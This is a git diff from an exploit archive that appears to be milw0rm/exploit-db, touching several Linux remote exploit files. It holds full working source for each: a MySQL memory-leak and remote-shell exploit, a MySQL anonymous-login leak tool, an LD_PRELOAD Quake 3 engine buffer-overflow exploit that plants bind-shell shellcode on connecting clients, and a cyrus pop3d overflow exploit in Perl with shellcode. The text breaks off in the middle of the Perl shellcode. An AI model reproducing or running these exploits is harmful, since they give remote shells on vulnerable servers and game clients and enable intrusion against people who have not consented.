+// ret= send(c, buf, ret, 0); + + return 0; +} + +usage () +{ + printf + ("\nusage my_exploit [-H] [-i] [-t 0xtable-address] [-a 0xthread-address] [[-s socket]|[-h host][-p port]][-x]\n\n\ +-H: this Help;\n\ +-i: Information leak exploit (shows the content of MySql Server Memory)\n\ +-x: shows c/s communication output in hexadecimal\n\ +-t: hexadecimal table_list struct address (by default we try to find it automatically)\n\ +-a: hexadecimal thread struct address (look at the error log to see something like: thd=0x8b1b338)\n\ +-u: mysql username (anonymous too ;)\n\ +-p: mysql userpass (if you need it)\n\ +-s: the socket path if is a unix socket\n\ +-h: hostname or IP address\n\ +-P: port (default 3306)\n\n\nExample_1 - Memoryleak: my_exploit -h 127.0.0.1 -u username -i\n\n\ +Example_2 - Remote Shell on port 2707: my_exploit -h 127.0.0.1 -u username -a 0x8b1b338 -t 0x8b3a880\n\n\ + "); + +} + +int +main (int argc, char *argv[]) +{ + + int fdest = 0; + int port = 3306; + int shell = 1; + int force_table = 0; + char buf1[65535]; + char *socket; + char *user = NULL; + char *pass = NULL; + char *host = NULL; + socket = strdup ("/tmp/mysql2.sock"); + opterr = 0; + + while ((c = getopt (argc, argv, "s:t:a:P:Hh:u:p:ix")) != -1) + switch (c) + { + case 's': + socket = (char *) optarg; + break; + case 't': + force_table = 1; + tbl = (int) strtol (optarg, NULL, 16); + //tbl=atoi( optarg ); + break; + case 'a': + thd = (int) strtol (optarg, NULL, 16); + break; + case 'u': + user = (char *) optarg; + break; + case 'p': + pass = (char *) optarg; + break; + case 'P': + port = atoi (optarg); + break; + case 'h': + host = (char *) optarg; + break; + case 'i': + shell = 0; + break; + case 'x': + hexdump = 1; + break; + case 'H': + usage (); + return 1; + default: + break; + } + + if (!force_table) + tbl = thd + 0x1f548; + conn = mysql_init (NULL); + int ret = mysql_real_connect (conn, /* pointer to connection handler */ + host, /* host to connect to */ + user, /* user name */ + pass, /* password */ + NULL, /* database to use */ + 0, /* port (use default) */ + socket, /* socket (use default) */ + 0); /* flags (none) */ + + if (!ret) + { + fprintf (stderr, "Can't connect, error : %s\n", mysql_error (conn)); + return 1; + } + printf ("using table_list:%x thread:%x\n", tbl, thd); + + fd = conn->net.fd; + + if (shell) + { + d = 2; + sendit (buf1, fdest, -1); + d = 3; + sendit (buf1, fdest, -1); + d = 3; + sendit (buf1, fdest, -1); + } + else + { + int l; + d = 3; + for (l = 0; l < 256; l++) + { + sendit (buf1, fdest, l); + } + } + mysql_close (conn); + + exit (0); +} + +// milw0rm.com [2006-05-02] diff --git a/platforms/linux/remote/1742.c b/platforms/linux/remote/1742.c index 5eae9e660..ea0d41961 100755 --- a/platforms/linux/remote/1742.c +++ b/platforms/linux/remote/1742.c @@ -1,227 +1,227 @@ -/* **************************************************************** - - April 21.st 2006 - - my_anon_db_leak.c - - MySql Anonimous Login Memory Leak - - MySql <= 5.0.20 - - MySql <= 4.1.x - - copyright 2006 Stefano Di Paola (stefano.dipaola_at_wisec.it) - - GPL 2.0 - **************************************************************** - - Disclaimer: - - In no event shall the author be liable for any damages - whatsoever arising out of or in connection with the use - or spread of this information. - Any use of this information is at the user's own risk. - - **************************************************************** - Compile with: - gcc my_anon_db_leak.c -o my_anon_db_leak - - usage: - my_anon_db_leak [-s path/to/socket] [-h hostname_or_ip] [-p port_num] [-n db_len] - - -*/ - - -#include -/* we need MSG_WAITALL - that's why this ugly #ifdef, why doesn't glibc2 -have MSG_WAITALL in its ?? -*/ - -#ifdef __linux__ -#include -#else -#include -#endif -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include /* sockaddr_in{} and other Internet defns */ -#include /* needed by gethostbyname */ -#include /* needed by inet_ntoa */ - - -char anon_pckt[] = { - 0x3d, 0x00, 0x00, 0x01, 0x0d, 0xa6, 0x03, 0x00, 0x00, 0x00, 0x00, 0x01, 0x08, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x14, 0x99, 0xdb, 0x54, 0xb6, 0x6a, - 0xd7, 0xc2, 0x86, 0x4c, 0x50, 0xa8, 0x14, 0xfe, 0x2e, 0x98, 0x27, 0x72, 0x0d, 0xad, 0x45, 0x73, - 0x00 -}; // len=16*4+1=65; - - -int anon_pckt_len = 65; - -#define USOCK "/tmp/mysql2.sock" - -int -tcp_conn (char *hostname, int port) -{ - - int sockfd; - int n; - struct sockaddr_in servaddr; - - struct hostent *hp; - - - - if ((hp = gethostbyname (hostname)) == 0) - { - perror ("gethostbyname"); - exit (0); - } - - if ((sockfd = socket (AF_INET, SOCK_STREAM, 0)) < 0) - { - perror ("socket"); - exit (1); - } - - bzero ((char *) &servaddr, sizeof (servaddr)); - servaddr.sin_family = AF_INET; - servaddr.sin_port = htons (port); - - memcpy (&servaddr.sin_addr, hp->h_addr, hp->h_length); - if (servaddr.sin_addr.s_addr <= 0) - { - perror ("bad address after gethostbyname"); - exit (1); - } - if (connect (sockfd, (struct sockaddr *) &servaddr, sizeof (servaddr)) < 0) - { - perror ("connect"); - exit (1); - } - return sockfd; -} - -int -unix_conn (char *path) -{ - int fd, len; - struct sockaddr_un sa; - - fd = socket (PF_UNIX, SOCK_STREAM, 0); - - if (fd < 0) - { - perror ("cli: socket(PF_UNIX,SOCK_STREAM)"); - exit (1); - } - - sa.sun_family = AF_UNIX; - strcpy (sa.sun_path, path); - len = sizeof (sa); - if (connect (fd, (struct sockaddr *) &sa, len) < 0) - { - perror ("cli: connect()"); - exit (1); - } - return fd; -} - -int -main (int argc, char *argv[]) -{ - int fd; - int i, ret; - char packet[65535]; - char *path; - char *host; - int port = 3306; - char buf[65535]; - int db_len = 0; - int pckt_len = anon_pckt_len; - int unix_sock = 1; - char c; - - path = strdup (USOCK); - host = strdup ("127.0.0.1"); - - opterr = 0; - - while ((c = getopt (argc, argv, "s:h:p:n:")) != -1) - switch (c) - { - case 's': - path = strdup (optarg); - unix_sock = 1; - break; - case 'h': - host = strdup (optarg); - unix_sock = 0; - break; - case 'p': - port = atoi (optarg); - unix_sock = 0; - break; - case 'n': - db_len = atoi (optarg); - break; - - default: - break; - } - - - bzero (packet, 65535); - - pckt_len = anon_pckt_len + db_len; - printf ("%d\n", pckt_len); - - for (i = 0; i < pckt_len; i++) - packet[i] = anon_pckt[i]; - - if (db_len) - for (i = anon_pckt_len - 2; i < pckt_len; i++) - packet[i] = 'A'; - - packet[pckt_len - 1] = '\0'; - - packet[0] = (char) (anon_pckt[0] + db_len) & 0xff; - packet[1] = (char) ((anon_pckt[0] + db_len) >> 8) & 0xff; - for (i = 0; i < pckt_len; i++) - printf (" %.2x%c", (unsigned char) packet[i], - ((i + 1) % 16 ? ' ' : '\n')); - printf ("\n"); - - - if (unix_sock) - fd = unix_conn (path); - else - fd = tcp_conn (host, port); - - sleep (1); - ret = recv (fd, buf, 65535, 0); - if (send (fd, packet, pckt_len, 0) != pckt_len) - { - perror ("cli: send(anon_pckt)"); - exit (1); - } - - ret = recv (fd, buf, 65535, 0); - for (i = 0; i < ret; i++) - printf ("%c", (isalpha (buf[i]) ? buf[i] : '.')); - printf ("\n"); - return 0; -} - -// milw0rm.com [2006-05-02] +/* **************************************************************** + + April 21.st 2006 + + my_anon_db_leak.c + + MySql Anonimous Login Memory Leak + + MySql <= 5.0.20 + + MySql <= 4.1.x + + copyright 2006 Stefano Di Paola (stefano.dipaola_at_wisec.it) + + GPL 2.0 + **************************************************************** + + Disclaimer: + + In no event shall the author be liable for any damages + whatsoever arising out of or in connection with the use + or spread of this information. + Any use of this information is at the user's own risk. + + **************************************************************** + Compile with: + gcc my_anon_db_leak.c -o my_anon_db_leak + + usage: + my_anon_db_leak [-s path/to/socket] [-h hostname_or_ip] [-p port_num] [-n db_len] + + +*/ + + +#include +/* we need MSG_WAITALL - that's why this ugly #ifdef, why doesn't glibc2 +have MSG_WAITALL in its ?? +*/ + +#ifdef __linux__ +#include +#else +#include +#endif +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include /* sockaddr_in{} and other Internet defns */ +#include /* needed by gethostbyname */ +#include /* needed by inet_ntoa */ + + +char anon_pckt[] = { + 0x3d, 0x00, 0x00, 0x01, 0x0d, 0xa6, 0x03, 0x00, 0x00, 0x00, 0x00, 0x01, 0x08, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x14, 0x99, 0xdb, 0x54, 0xb6, 0x6a, + 0xd7, 0xc2, 0x86, 0x4c, 0x50, 0xa8, 0x14, 0xfe, 0x2e, 0x98, 0x27, 0x72, 0x0d, 0xad, 0x45, 0x73, + 0x00 +}; // len=16*4+1=65; + + +int anon_pckt_len = 65; + +#define USOCK "/tmp/mysql2.sock" + +int +tcp_conn (char *hostname, int port) +{ + + int sockfd; + int n; + struct sockaddr_in servaddr; + + struct hostent *hp; + + + + if ((hp = gethostbyname (hostname)) == 0) + { + perror ("gethostbyname"); + exit (0); + } + + if ((sockfd = socket (AF_INET, SOCK_STREAM, 0)) < 0) + { + perror ("socket"); + exit (1); + } + + bzero ((char *) &servaddr, sizeof (servaddr)); + servaddr.sin_family = AF_INET; + servaddr.sin_port = htons (port); + + memcpy (&servaddr.sin_addr, hp->h_addr, hp->h_length); + if (servaddr.sin_addr.s_addr <= 0) + { + perror ("bad address after gethostbyname"); + exit (1); + } + if (connect (sockfd, (struct sockaddr *) &servaddr, sizeof (servaddr)) < 0) + { + perror ("connect"); + exit (1); + } + return sockfd; +} + +int +unix_conn (char *path) +{ + int fd, len; + struct sockaddr_un sa; + + fd = socket (PF_UNIX, SOCK_STREAM, 0); + + if (fd < 0) + { + perror ("cli: socket(PF_UNIX,SOCK_STREAM)"); + exit (1); + } + + sa.sun_family = AF_UNIX; + strcpy (sa.sun_path, path); + len = sizeof (sa); + if (connect (fd, (struct sockaddr *) &sa, len) < 0) + { + perror ("cli: connect()"); + exit (1); + } + return fd; +} + +int +main (int argc, char *argv[]) +{ + int fd; + int i, ret; + char packet[65535]; + char *path; + char *host; + int port = 3306; + char buf[65535]; + int db_len = 0; + int pckt_len = anon_pckt_len; + int unix_sock = 1; + char c; + + path = strdup (USOCK); + host = strdup ("127.0.0.1"); + + opterr = 0; + + while ((c = getopt (argc, argv, "s:h:p:n:")) != -1) + switch (c) + { + case 's': + path = strdup (optarg); + unix_sock = 1; + break; + case 'h': + host = strdup (optarg); + unix_sock = 0; + break; + case 'p': + port = atoi (optarg); + unix_sock = 0; + break; + case 'n': + db_len = atoi (optarg); + break; + + default: + break; + } + + + bzero (packet, 65535); + + pckt_len = anon_pckt_len + db_len; + printf ("%d\n", pckt_len); + + for (i = 0; i < pckt_len; i++) + packet[i] = anon_pckt[i]; + + if (db_len) + for (i = anon_pckt_len - 2; i < pckt_len; i++) + packet[i] = 'A'; + + packet[pckt_len - 1] = '\0'; + + packet[0] = (char) (anon_pckt[0] + db_len) & 0xff; + packet[1] = (char) ((anon_pckt[0] + db_len) >> 8) & 0xff; + for (i = 0; i < pckt_len; i++) + printf (" %.2x%c", (unsigned char) packet[i], + ((i + 1) % 16 ? ' ' : '\n')); + printf ("\n"); + + + if (unix_sock) + fd = unix_conn (path); + else + fd = tcp_conn (host, port); + + sleep (1); + ret = recv (fd, buf, 65535, 0); + if (send (fd, packet, pckt_len, 0) != pckt_len) + { + perror ("cli: send(anon_pckt)"); + exit (1); + } + + ret = recv (fd, buf, 65535, 0); + for (i = 0; i < ret; i++) + printf ("%c", (isalpha (buf[i]) ? buf[i] : '.')); + printf ("\n"); + return 0; +} + +// milw0rm.com [2006-05-02] diff --git a/platforms/linux/remote/1750.c b/platforms/linux/remote/1750.c index 55f1a9bc5..a0c4ba95e 100755 --- a/platforms/linux/remote/1750.c +++ b/platforms/linux/remote/1750.c @@ -1,245 +1,245 @@ -// remap_this.c - "R_RemapShader()" q3 engine 1.32b client remote bof exploit -// by landser - landser at hotmail.co.il -// -// this code works as a preloaded shared library on a game server, -// it hooks two functions on the running server: -// svc_directconnect() that is called when a client connects, -// and sv_sendservercommand() which we use to send malformed "remapShader" commands to clients. -// vuln clients connecting to the server will bind a shell on a chosen port (#define PORT) and exit cleanly with an unsuspicious error message. -// -// vuln: latest linux clients of ET, rtcw, and q3 on boxes with +x stack (independent of distro) -// (win32 clients are vuln too but not included here) -// -// usage: -// gcc remap_this.c -shared -fPIC -o remap_this.so -// and run a server with env LD_PRELOAD="./remap_this.so" -// -// ----------------------------------------------------- -// [luser@box ~/wolfenstein]$ LD_PRELOAD="./remap_this.so" ./wolfded.x86 +set net_port 5678 +map mp_beach -// remap_this.c by landser - landser at hotmail.co.il -// -// game: RtCW 1.41 Dedicated. -// [...] -// directconnect(): 10.0.0.4 connected -// sendservercommand() called -// sendservercommand() called -// sendservercommand() called -// [...] -// [luser@box ~/wolfenstein]$ nc 10.0.0.4 27670 -vv -// sus4 [10.0.0.4] 27670 (?) open -// id -// uid=1000(luser) gid=100(lusers) -// ----------------------------------------------------- -// -// visit www.nixcoders.org for open source linux cheats - -#define _GNU_SOURCE -#include -#include -#include -#include -#include -#include - -#define SILENT // hide the crappy server output -#define PORT 27670 // bindshell port. some values are invalid - -struct netaddr { // from q3-1.32b/qcommon/qcommon.h - int type; - unsigned char ip[4]; - unsigned char ipx[10]; - unsigned short port; -}; - -struct { - char *name; - char *fn; - unsigned long retaddr; // something that jumps to %esp - unsigned long sendservercommand; // address of sv_sendservercommand() - unsigned long directconnect; // address of svc_directconnect() - int hooklen; // for both sendservercommand and directconnect - unsigned long errormsg; // address of error string - unsigned long comerror; // address of com_error() - int popas; // num of popa instructions before shellcode - int gap; // gap between %esp to %eip when prog gets to the last shellcode instruction -} games[] = { - {"ET 2.60 Dedicated", "etded", - 0x081b4133, 0x08056c10, 0x0804e880, 6, 0x081a6a65, 0x0806a1a0, 14, 12}, - {"RtCW 1.41 Dedicated", "wolfded", - 0x080c4356, 0x0805ee94, 0x08058740, 9, 0x08187772, 0x080a87e8, 14, 12}, - {"Quake 3 1.32b Dedicated", "q3ded", - 0x080a200b, 0x0805fa68, 0x08059884, 9, 0x08167635, 0x08094688, 11, 27}, -}; - -const int ngames = sizeof(games) / sizeof(games[0]); -const unsigned short int port = PORT; - -static void *hook (void *, int, void *); -static void sendservercommand (void *, const char *, ...); -static void directconnect (struct netaddr); -static void writebuf (void); - -void (*_sendservercommand)(void *, const char *, ...); -void (*_directconnect)(struct netaddr); - -int c = -1; -unsigned char buf[1024]; - -// shellcode (286 bytes): -// fork()s, -// the parent proc calls com_error() with an error message (errormsg var), -// the child proc binds a shell on a chosen port -// unallowed chars: 0x00, 0x22, 0x2e, 0x5c, >=0x80 -unsigned char sc[] = - "\x68\x03\x5a\x70\x50\x58\x05\x01\x01\x7b\x71\x50\x68\x57\x50\x7f\x69" - "\x58\x05\x01\x7d\x01\x01\x50\x68\x70\x30\x6a\x06\x58\x66\x05\x7b\x76" - "\x50\x68\x54\x5b\x52\x53\x68\x2f\x62\x69\x6e\x68\x2f\x73\x68\x68\x68" - "\x0b\x58\x68\x2f\x68\x48\x78\x79\x69\x58\x05\x01\x01\x7f\x01\x50\x68" - "\x3e\x57\x50\x01\x58\x05\x01\x01\x7d\x7f\x50\x68\x75\x1c\x59\x6a\x68" - "\x50\x01\x48\x40\x58\x66\x05\x7d\x7f\x50\x68\x5b\x6a\x02\x58\x68\x7f" - "\x50\x53\x58\x58\x66\x40\x50\x68\x69\x65\x57\x50\x58\x05\x01\x01\x01" - "\x7d\x50\x68\x57\x54\x59\x43\x68\x7f\x5f\x50\x50\x58\x66\x40\x50\x68" - "\x69\x65\x57\x50\x58\x05\x01\x01\x01\x7d\x50\x68\x7f\x6a\x04\x5b\x58" - "\x66\x40\x50\x68\x69\x65\x57\x50\x58\x05\x01\x01\x01\x7d\x50\x68\x51" - "\x50\x54\x59\x68\x45\x55\x6a\x10\x68\x5b\x0e\x50\x44\x58\x05\x02\x01" - "\x7d\x01\x50" "PORT" "\x66\x68\x5b\x5d\x52\x66\x68\x53\x58\x50\x01" - "\x58\x05\x01\x01\x7d\x7f\x50\x68\x52\x53\x6a\x02\x68\x4a\x6a\x01\x5b" - "\x68\x58\x6a\x01\x5a\x68\x07\x50\x6a\x66\x58\x66\x05\x01\x73\x50\x68" - "\x67" "CM1" "\x58\x05\x01" "CM2" "\x50\x68\x6a\x02\x6a\x01\x68" "ERRM" - "\x68\x40\x74\x0f\x68\x68\x57\x50\x7f\x47\x58\x05\x01\x7d\x01\x01\x50" - "\x68\x41\x41\x6a\x02\x74\x0c\x75\x0a"; - -void __attribute__ ((constructor)) init (void) { - char buf[256]; - int ret; - - printf("remap_this.c by landser - landser at hotmail.co.il\n\n"); - - ret = readlink("/proc/self/exe", buf, sizeof buf); - if (ret < 0) { - perror("readlink()"); - exit(EXIT_FAILURE); - } - buf[ret] = '\0'; - - for (c=0;c> (8*i)) & 0xff; - - if ((b-1) >= 0x7f) { - cm1[i] = 0x6b; - cm2[i] = b - 0x6b; - } - else { - cm1[i] = b - 1; - cm2[i] = 1; - } - } - - ptr = strstr(ptr, "PORT"); - if (!ptr) abort(); - memcpy(ptr, "\x68\x68", 2); // 68 - pushl imm32 - memcpy(ptr+2, &port, sizeof port); - - ptr = strstr(ptr, "ERRM"); - if (!ptr) abort(); - memcpy(ptr, &games[c].errormsg, 4); - - strcat(ptr, "\""); - if (!strstr(games[c].name, "Quake")) strcat(ptr, " j w"); -} - -#define PAGE(x) (void *)((unsigned long)x & 0xfffff000) - -static void *hook (void *hfunc, int len, void *wfunc) { - void *newmem = malloc(len+5); - long rel32; - - // copy 'len' bytes of instruction from 'hfunc' to 'newmem' and a 'jmp *hfunc' instruction after it - memcpy(newmem, hfunc, len); - memset(newmem+len, 0xe9, 1); // e9 - jmp rel32 - rel32 = hfunc - (newmem+5); - memcpy(newmem+len+1, &rel32, sizeof rel32); - - // make 'hfunc's address writable & executable - mprotect(PAGE(hfunc), 4096, PROT_READ|PROT_WRITE|PROT_EXEC); - - // change the start of 'hfunc' to a 'jmp *wfunc' instruction - memset(hfunc, 0xe9, 1); // e9 - jmp rel32 - rel32 = wfunc - (hfunc+5); - memcpy(hfunc+1, &rel32, sizeof rel32); - - return newmem; -} - -// milw0rm.com [2006-05-05] +// remap_this.c - "R_RemapShader()" q3 engine 1.32b client remote bof exploit +// by landser - landser at hotmail.co.il +// +// this code works as a preloaded shared library on a game server, +// it hooks two functions on the running server: +// svc_directconnect() that is called when a client connects, +// and sv_sendservercommand() which we use to send malformed "remapShader" commands to clients. +// vuln clients connecting to the server will bind a shell on a chosen port (#define PORT) and exit cleanly with an unsuspicious error message. +// +// vuln: latest linux clients of ET, rtcw, and q3 on boxes with +x stack (independent of distro) +// (win32 clients are vuln too but not included here) +// +// usage: +// gcc remap_this.c -shared -fPIC -o remap_this.so +// and run a server with env LD_PRELOAD="./remap_this.so" +// +// ----------------------------------------------------- +// [luser@box ~/wolfenstein]$ LD_PRELOAD="./remap_this.so" ./wolfded.x86 +set net_port 5678 +map mp_beach +// remap_this.c by landser - landser at hotmail.co.il +// +// game: RtCW 1.41 Dedicated. +// [...] +// directconnect(): 10.0.0.4 connected +// sendservercommand() called +// sendservercommand() called +// sendservercommand() called +// [...] +// [luser@box ~/wolfenstein]$ nc 10.0.0.4 27670 -vv +// sus4 [10.0.0.4] 27670 (?) open +// id +// uid=1000(luser) gid=100(lusers) +// ----------------------------------------------------- +// +// visit www.nixcoders.org for open source linux cheats + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include + +#define SILENT // hide the crappy server output +#define PORT 27670 // bindshell port. some values are invalid + +struct netaddr { // from q3-1.32b/qcommon/qcommon.h + int type; + unsigned char ip[4]; + unsigned char ipx[10]; + unsigned short port; +}; + +struct { + char *name; + char *fn; + unsigned long retaddr; // something that jumps to %esp + unsigned long sendservercommand; // address of sv_sendservercommand() + unsigned long directconnect; // address of svc_directconnect() + int hooklen; // for both sendservercommand and directconnect + unsigned long errormsg; // address of error string + unsigned long comerror; // address of com_error() + int popas; // num of popa instructions before shellcode + int gap; // gap between %esp to %eip when prog gets to the last shellcode instruction +} games[] = { + {"ET 2.60 Dedicated", "etded", + 0x081b4133, 0x08056c10, 0x0804e880, 6, 0x081a6a65, 0x0806a1a0, 14, 12}, + {"RtCW 1.41 Dedicated", "wolfded", + 0x080c4356, 0x0805ee94, 0x08058740, 9, 0x08187772, 0x080a87e8, 14, 12}, + {"Quake 3 1.32b Dedicated", "q3ded", + 0x080a200b, 0x0805fa68, 0x08059884, 9, 0x08167635, 0x08094688, 11, 27}, +}; + +const int ngames = sizeof(games) / sizeof(games[0]); +const unsigned short int port = PORT; + +static void *hook (void *, int, void *); +static void sendservercommand (void *, const char *, ...); +static void directconnect (struct netaddr); +static void writebuf (void); + +void (*_sendservercommand)(void *, const char *, ...); +void (*_directconnect)(struct netaddr); + +int c = -1; +unsigned char buf[1024]; + +// shellcode (286 bytes): +// fork()s, +// the parent proc calls com_error() with an error message (errormsg var), +// the child proc binds a shell on a chosen port +// unallowed chars: 0x00, 0x22, 0x2e, 0x5c, >=0x80 +unsigned char sc[] = + "\x68\x03\x5a\x70\x50\x58\x05\x01\x01\x7b\x71\x50\x68\x57\x50\x7f\x69" + "\x58\x05\x01\x7d\x01\x01\x50\x68\x70\x30\x6a\x06\x58\x66\x05\x7b\x76" + "\x50\x68\x54\x5b\x52\x53\x68\x2f\x62\x69\x6e\x68\x2f\x73\x68\x68\x68" + "\x0b\x58\x68\x2f\x68\x48\x78\x79\x69\x58\x05\x01\x01\x7f\x01\x50\x68" + "\x3e\x57\x50\x01\x58\x05\x01\x01\x7d\x7f\x50\x68\x75\x1c\x59\x6a\x68" + "\x50\x01\x48\x40\x58\x66\x05\x7d\x7f\x50\x68\x5b\x6a\x02\x58\x68\x7f" + "\x50\x53\x58\x58\x66\x40\x50\x68\x69\x65\x57\x50\x58\x05\x01\x01\x01" + "\x7d\x50\x68\x57\x54\x59\x43\x68\x7f\x5f\x50\x50\x58\x66\x40\x50\x68" + "\x69\x65\x57\x50\x58\x05\x01\x01\x01\x7d\x50\x68\x7f\x6a\x04\x5b\x58" + "\x66\x40\x50\x68\x69\x65\x57\x50\x58\x05\x01\x01\x01\x7d\x50\x68\x51" + "\x50\x54\x59\x68\x45\x55\x6a\x10\x68\x5b\x0e\x50\x44\x58\x05\x02\x01" + "\x7d\x01\x50" "PORT" "\x66\x68\x5b\x5d\x52\x66\x68\x53\x58\x50\x01" + "\x58\x05\x01\x01\x7d\x7f\x50\x68\x52\x53\x6a\x02\x68\x4a\x6a\x01\x5b" + "\x68\x58\x6a\x01\x5a\x68\x07\x50\x6a\x66\x58\x66\x05\x01\x73\x50\x68" + "\x67" "CM1" "\x58\x05\x01" "CM2" "\x50\x68\x6a\x02\x6a\x01\x68" "ERRM" + "\x68\x40\x74\x0f\x68\x68\x57\x50\x7f\x47\x58\x05\x01\x7d\x01\x01\x50" + "\x68\x41\x41\x6a\x02\x74\x0c\x75\x0a"; + +void __attribute__ ((constructor)) init (void) { + char buf[256]; + int ret; + + printf("remap_this.c by landser - landser at hotmail.co.il\n\n"); + + ret = readlink("/proc/self/exe", buf, sizeof buf); + if (ret < 0) { + perror("readlink()"); + exit(EXIT_FAILURE); + } + buf[ret] = '\0'; + + for (c=0;c> (8*i)) & 0xff; + + if ((b-1) >= 0x7f) { + cm1[i] = 0x6b; + cm2[i] = b - 0x6b; + } + else { + cm1[i] = b - 1; + cm2[i] = 1; + } + } + + ptr = strstr(ptr, "PORT"); + if (!ptr) abort(); + memcpy(ptr, "\x68\x68", 2); // 68 - pushl imm32 + memcpy(ptr+2, &port, sizeof port); + + ptr = strstr(ptr, "ERRM"); + if (!ptr) abort(); + memcpy(ptr, &games[c].errormsg, 4); + + strcat(ptr, "\""); + if (!strstr(games[c].name, "Quake")) strcat(ptr, " j w"); +} + +#define PAGE(x) (void *)((unsigned long)x & 0xfffff000) + +static void *hook (void *hfunc, int len, void *wfunc) { + void *newmem = malloc(len+5); + long rel32; + + // copy 'len' bytes of instruction from 'hfunc' to 'newmem' and a 'jmp *hfunc' instruction after it + memcpy(newmem, hfunc, len); + memset(newmem+len, 0xe9, 1); // e9 - jmp rel32 + rel32 = hfunc - (newmem+5); + memcpy(newmem+len+1, &rel32, sizeof rel32); + + // make 'hfunc's address writable & executable + mprotect(PAGE(hfunc), 4096, PROT_READ|PROT_WRITE|PROT_EXEC); + + // change the start of 'hfunc' to a 'jmp *wfunc' instruction + memset(hfunc, 0xe9, 1); // e9 - jmp rel32 + rel32 = wfunc - (hfunc+5); + memcpy(hfunc+1, &rel32, sizeof rel32); + + return newmem; +} + +// milw0rm.com [2006-05-05] diff --git a/platforms/linux/remote/181.c b/platforms/linux/remote/181.c index 5c59329d3..e8e825435 100755 --- a/platforms/linux/remote/181.c +++ b/platforms/linux/remote/181.c @@ -385,6 +385,6 @@ main(int argc, char **argv) } assembly_shell_code(sock, addr, port, laddr, linfo); -} - -// milw0rm.com [2000-11-16] +} + +// milw0rm.com [2000-11-16] diff --git a/platforms/linux/remote/2185.pl b/platforms/linux/remote/2185.pl index 93b9ff6d5..47606f224 100755 --- a/platforms/linux/remote/2185.pl +++ b/platforms/linux/remote/2185.pl @@ -1,62 +1,62 @@ -#!/usr/bin/perl -## Creator: K-sPecial (xzziroz.net) of .aware (awarenetwork.org) -## Name: bid-18056.pl -## Date: 08/12/2006 -## -## Description: this is yet another exploit for the cyrus pop3d buffer overflow. I tried both public -## exploits and not either of them worked (not that they don't but coding my own is generaly faster -## and easier) so I coded my own. The exploit by kcope seems to be done right and maybe i just got realy -## unlucky and missed the offset in between the 5 runs i gave it. The one from bannedit was interesting... -## realy nice idea about overwriting the pointer and sticking your shellcode in GOT. Only problem is that -## when i was writing this exploit with the same method, and i placed my shellcode in GOT, functions before -## the return from the vuln function where segfaulting first by trying to actualy *use* the GOT! So what I have -## done here is used the same method, yet found a data area that is not going to freak pop3d -## out before it gets to the return. Specificy I use part of the .data segment (or was it .bss, anyways) labeled -## 'buf'. With this the same one-offset-per-machine is gained that bannedit was achieving. -## -## Other: Basicly what all this means, is you just have to give an offset that is a location in memory that -## is writeable and executable (anything in .data, .bss, .stack, .heap, etc) and make sure it's not something -## that will need to be used by functions in pop3d before popd_canon_user() returns and hence executes your -## shellcode (because it'll segfault and won't get executed). -## -## Note: bindport is 13370 -################################################################################################################# -use IO::Socket; -use strict; - -my $host = $ARGV[0] || help(); -my $offset = $ARGV[1] || help(); -my $port = 110; - -# stollen from cyruspop3d.c because this actualy worked, i couldn't get any -# metasploit sc to work (as usualy, hmph) -my $shellcode = -"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96". -"\x43\x52\x66\x68\x34\x3a\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56". -"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1". -"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0". -"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53". -"\x89\xe1\xcd\x80"; - -my $sock = IO::Socket::INET->new('PeerAddr' => $host, - 'PeerPort' => $port) or die ("-!> unable to connect to '$host:$port': $!\n"); - -$sock->autoflush(); - -print $sock "USER "; ## begin USER command with just that -print $sock "$shellcode"; ## shellcode is *userbuf is *user -print $sock pack('l', hex($offset)) x 120; ## location overwrites EIP and *out, userbuf/user written to *out -print $sock "\n"; ## that simple - -sub help { - print "bid-18056.pl by K-sPecial (xzziroz.net) of .aware (awarenetwork.org)\n"; - print "08/12/2006\n\n"; - print "perl $0 \$host \$offset\n\n"; - - print "Offsets: \n"; - print "0x8106c20 (debian 3.1 - 2.6.16-rc6)\n"; - - exit(0); -} - -# milw0rm.com [2006-08-14] +#!/usr/bin/perl +## Creator: K-sPecial (xzziroz.net) of .aware (awarenetwork.org) +## Name: bid-18056.pl +## Date: 08/12/2006 +## +## Description: this is yet another exploit for the cyrus pop3d buffer overflow. I tried both public +## exploits and not either of them worked (not that they don't but coding my own is generaly faster +## and easier) so I coded my own. The exploit by kcope seems to be done right and maybe i just got realy +## unlucky and missed the offset in between the 5 runs i gave it. The one from bannedit was interesting... +## realy nice idea about overwriting the pointer and sticking your shellcode in GOT. Only problem is that +## when i was writing this exploit with the same method, and i placed my shellcode in GOT, functions before +## the return from the vuln function where segfaulting first by trying to actualy *use* the GOT! So what I have +## done here is used the same method, yet found a data area that is not going to freak pop3d +## out before it gets to the return. Specificy I use part of the .data segment (or was it .bss, anyways) labeled +## 'buf'. With this the same one-offset-per-machine is gained that bannedit was achieving. +## +## Other: Basicly what all this means, is you just have to give an offset that is a location in memory that +## is writeable and executable (anything in .data, .bss, .stack, .heap, etc) and make sure it's not something +## that will need to be used by functions in pop3d before popd_canon_user() returns and hence executes your +## shellcode (because it'll segfault and won't get executed). +## +## Note: bindport is 13370 +################################################################################################################# +use IO::Socket; +use strict; + +my $host = $ARGV[0] || help(); +my $offset = $ARGV[1] || help(); +my $port = 110; + +# stollen from cyruspop3d.c because this actualy worked, i couldn't get any +# metasploit sc to work (as usualy, hmph) +my $shellcode = 